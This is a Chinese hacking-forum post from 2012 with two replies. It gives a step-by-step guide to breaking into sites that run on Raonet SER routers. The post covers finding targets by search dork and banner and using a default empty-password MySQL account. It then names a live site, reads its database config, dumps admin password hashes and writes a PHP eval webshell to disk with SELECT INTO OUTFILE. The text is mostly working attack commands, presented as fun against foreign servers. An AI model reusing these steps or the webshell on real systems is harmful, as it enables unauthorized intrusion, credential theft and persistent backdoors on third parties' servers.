找回密码
 立即注册
查看: 3739|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:5 U3 M6 T* c+ W0 K: `# E! d  U6 W

$ F2 N& Z. H2 m% Y1:google搜索'Raonet Subscriber Ethernet Router'
5 s. U% \7 o" p1 m! F) K
( q7 f: G% P  z1 g. Y. U1 p, S2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
$ f6 ~, {; R5 y' |, [2 w3 w# O' _. @' `$ p5 \1 V$ x
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, \. F* {$ u, _; F0 j6 X  k" z3 d  R
& r  M! A  p% v% `//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
  O5 `8 _: S( P" k5 l3 Y
6 J* s) f3 y5 |$ m/ _2 R) O, z7 o 1 D7 W$ }8 T+ T8 g9 Y

; a8 j% T/ X+ t" }8 t入侵步骤:; o8 A  q2 D- d% V  \' S' c1 f
- ^' f* G+ |! `% O" R( C  |3 \
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php, x. L4 s& V. D* Y; L2 [7 n9 G

1 v3 z, ?& e& H. |2 v% Z2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
, c. F+ V1 V! D1 X1 U7 h. }3:得到密码后连接,查看GUI管理密码:
0 N) }3 a* E( A; P) j5 i; Buse ser_500
  a2 a! B5 T, L, G' q; ?1 D) }8 nselect id,passwd from user;
% s$ p( A) }6 |) e4 G9 O: y# W4:通过数据库写入webshell,执行命令:
$ ]2 w0 p! }9 s7 L7 yuse mysql;4 ^" L% D9 u: S4 e
create table ok(cmd TEXT);
3 V, i2 Y+ }1 b# m+ Qinsert into ok values("<?php @eval($_POST[cmd])?>");! ]2 R. e4 I, `& B
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 I5 _# k: L6 k7 Q! {drop table ok;9 x% v8 b* \" r6 }0 I$ f/ e2 ~* Y' Y
* b; U: T* T. s8 H  i1 v
5:连接后门shell.php
, t/ h$ w) y) ^. C8 H5 s! z! [8 X: M. z& ]+ s3 g
6. 搞定!. R# K4 m4 y+ Q% \3 e/ Y
% Y" f& @: h. z& {' C* v4 H1 O
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表